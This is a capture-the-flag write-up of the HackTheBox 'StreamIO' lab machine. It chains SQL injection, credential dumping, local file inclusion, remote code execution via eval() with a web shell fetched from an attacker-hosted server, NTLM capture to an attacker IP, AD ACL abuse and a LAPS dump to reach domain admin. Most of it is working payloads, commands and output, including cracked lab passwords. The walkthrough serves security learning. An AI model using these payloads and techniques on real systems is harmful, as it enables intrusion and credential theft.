# StreamIO — Full Exploitation Walkthrough

> Attack Chain:
> Enumeration → MSSQL Injection → Credential Dump → Admin Panel Abuse → LFI → RCE → MSSQL Lateral Movement → AD ACL Abuse → LAPS → Domain Admin

---

# 1️⃣ Initial Enumeration

---

## Nmap Scan

```bash
nmap -sV -sC -Pn 10.129.22.10 -vv
```

### Results

```
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  ncacn_http
636/tcp  open  tcpwrapped
3268/tcp open  ldap
3269/tcp open  tcpwrapped
```

### Important Observations

* Domain Controller detected
* Kerberos exposed
* LDAP exposed
* SMB signing required
* IIS 10 running ASP.NET
* TRACE method enabled (potential XST risk)
* SSL cert reveals:

  * streamIO.htb
  * watch.streamIO.htb

---

# DNS Enumeration (Port 53)

```bash
dig any streamIO.htb @10.129.22.10
```

Confirmed:

```
streamIO.htb → 10.129.22.10
NS → dc.streamIO.htb
```

---

# RPC Enumeration (135)

```bash
rpcclient -U "" -N 10.129.22.10
```

```
NT_STATUS_ACCESS_DENIED
```

Anonymous disabled.

---

# LDAP Enumeration (389 / 636)

```bash
enum4linux -u "guest" -p "" 10.129.22.10
cme ldap 10.129.22.10 -u guest -p ""
```

```
STATUS_ACCOUNT_DISABLED
```

Guest disabled.

---

# SMB Enumeration (445)

```bash
crackmapexec smb 10.129.22.10
crackmapexec smb 10.129.22.10 -u "" -p "" --shares
cme smb 10.129.22.10 -u "" -p "" --rid-brute
crackmapexec smb 10.129.22.10 -u "" -p "" --users
```

All blocked.

Important:

```
(signing:True)
(SMBv1:False)
```

SMB relay impossible.

---

# AS-REP Roasting Attempt

```bash
cat users.txt
```

```bash
impacket-GetNPUsers streamio.htb/ -dc-ip 10.129.22.10 -usersfile users.txt -format hashcat
```

Result:

```
KDC_ERR_C_PRINCIPAL_UNKNOWN
```

Users do not exist in domain.

---

# 2️⃣ Web Enumeration

---

## Port 80

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://streamIO.htb/ --exclude-length 335
```

Discovered:

```
/login
```

```bash
nikto -h http://streamIO.htb/
```

Server:

```
Microsoft-IIS/10.0
X-Powered-By: ASP.NET
```

---

## Port 443

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://streamIO.htb/admin/ --exclude-length 335 -x php,php3,xml,.log,.conf -k
```

Discovered:

```
/admin/master.php
/login.php
/admin/
/contact.php
/about.php
```

Email found:

```
oliver@Streamio.htb
```

Names found:

```
Barry
Oliver
Samantha
```

---

# MSSQL Injection — watch.streamio.htb

Target:

```
https://watch.streamio.htb/search.php
```

Test:

```
q=500' or 1=1--
```

Blocked → Filter present.

Bypass:

```
q=500' union select 1,2,3,4,5,6--
```

Version extraction:

```
q=500' union select 1,@@version,3,4,5,6--
```

Result:

```
Microsoft SQL 2019 10.0.17763
```

---

# NTLM Capture via xp_dirtree

Responder:

```bash
sudo responder -I tun0 -dw
```

Injection:

```
q=300'; use master; exec xp_dirtree '\\10.10.14.98\test\responder';-- -
```

Captured:

```
streamIO\DC$
```

Machine account hash → Not crackable.

---

# Database Enumeration

List DBs:

```
300' union select 1,name,3,4,5,6 FROM master.dbo.sysdatabases;-- -
```

Found:

```
STREAMIO
streamio_backup
```

---

## Enumerate Tables

```
300' union select 1,table_name,3,4,5,6 FROM streamio.INFORMATION_SCHEMA.TABLES;-- -
```

Found:

```
movies
users
```

---

## Enumerate Columns

```
300' union select 1,column_name,3,4,5,6 FROM streamio.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users';-- -
```

Found:

```
username
password
is_staff
```

---

## Extract Credentials

```
300' union select 1,concat_ws(':',username,password),3,4,5,6 FROM streamio.dbo.users;-- -
```

Hashes obtained (MD5).

Cracked via:

[https://crackstation.net/](https://crackstation.net/)

Recovered:

```
admin:paddpadd
Barry:$hadoW
Bruno:$monique$1991$
Clara:%$clara
Juliette:$3xybitch
Lauren:##123a8j8w5123##
Lenord:physics69i
Michelle:!?Love?!123
Sabrina:!!sabrina$
Thane:highschoolmusical
Victoria:!5psycho8!
yoshihide:66boysandgirls..
```

---

# Login Brute Force

```bash
hydra -L users.txt -P passwd.txt streamio.htb https-post-form '/login.php:username=^USER^&password=^PASS^:F=login failure' -vf
```

Valid:

```
yoshihide:66boysandgirls..
```

---

# 3️⃣ Admin Panel Abuse

Access:

```
https://streamio.htb/admin/
```

Fuzz parameters:

```bash
ffuf -ic -c -w burp-parameter-names.txt -b 'PHPSESSID=xxx' -u 'https://streamio.htb/admin/?FUZZ=' -mc all -fc 404 -fs 1678
```

Found:

```
debug
```

---

# Local File Inclusion

Test:

```
https://streamio.htb/admin/?debug=c:\windows\win.ini
```

Confirmed LFI.

---

# NTLM Capture via LFI

```
https://streamio.htb/admin/?debug=\\10.10.14.98\test\responder
```

Captured:

```
streamIO\yoshihide
```

Hashcat:

```bash
hashcat -m 5600 -a 0 hash rockyou.txt
```

Failed to crack.

---

# PHP Source Disclosure via Filters

```
https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php
```

Decode:

```bash
echo <base64> | base64 -d
```

Discovered credentials:

```
UID => db_admin
PWD => B1@hx31234567890
```

---

# Critical RCE — eval() Abuse

Decoded master.php:

```php
if(isset($_POST['include']))
{
 if($_POST['include'] !== "index.php")
 eval(file_get_contents($_POST['include']));
}
```

This is full Remote Code Execution.

---

# Initial Shell Attempt

Create shell:

```php
system($_REQUEST['cmd']);
```

Host:

```bash
python3 -m http.server 8080
```

Exploit:

```
POST /admin/?debug=master.php
include=http://10.10.14.98:4443/shell.txt
```

RCE confirmed.

---

# MSSQL Lateral Movement

Use SQLCMD:

```bash
sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q 'SELECT DB_NAME(); SELECT name FROM master..sysdatabases;'
```

Enumerate backup tables:

```bash
sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q 'SELECT name FROM streamio_backup..sysobjects WHERE xtype = "U"'
```

Extract credentials:

```bash
sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q 'USE STREAMIO_BACKUP; select username,password from users;'
```

---

# 4️⃣ Privilege Escalation — Active Directory

WinPEAS reveals Firefox DB.

Extract key4.db.

Decrypt using:

```bash
wget https://raw.githubusercontent.com/lclevy/firepwd/master/firepwd.py
pip3 install -r requirements.txt
python3 firepwd.py
```

New credentials discovered.

---

# BloodHound Enumeration

```bash
git clone https://github.com/fox-it/BloodHound.py.git
python3 bloodhound.py -d streamio.htb -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -gc dc.streamio.htb -ns 10.10.11.158 -c all
```

Finding:

```
JDgodd → WriteOwner → CORE STAFF
CORE STAFF → ReadLAPS → DC
```

---

# ACL Abuse with PowerView

Upload PowerView:

```powershell
upload PowerView.ps1
. .\PowerView.ps1
```

Create credential object:

```powershell
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd',$SecPassword)
```

Take ownership:

```powershell
Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Cred $cred
```

Grant full rights:

```powershell
Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity JDgodd -Cred $cred -Rights All
```

Add to group:

```powershell
Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Cred $cred
```

Verify:

```powershell
net group 'CORE STAFF'
```

---

# LAPS Dump via LDAP

```bash
ldapsearch -h streamio.htb -b 'DC=streamIO,DC=htb' -x -D JDgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
```

Extracted:

```
Administrator password: -6/8RYZp4hY6t)
```

---

# Final Access

```bash
evil-winrm -i streamio.htb -u Administrator -p '-6/8RYZp4hY6t)'
```

Full Domain Admin compromise.

---

# 🔥 Root Cause Summary

1. MSSQL injection
2. Weak password storage (MD5)
3. Credential reuse
4. LFI
5. RCE via eval()
6. DB credential reuse
7. ACL misconfiguration
8. LAPS misconfiguration

---

# 🧠 Real-World Lessons

This box perfectly demonstrates:

* Web app → Domain compromise chain
* Why LAPS must be tightly scoped
* Why WriteOwner is critical
* Why eval() in production is catastrophic
* Why service account reuse is dangerous

---
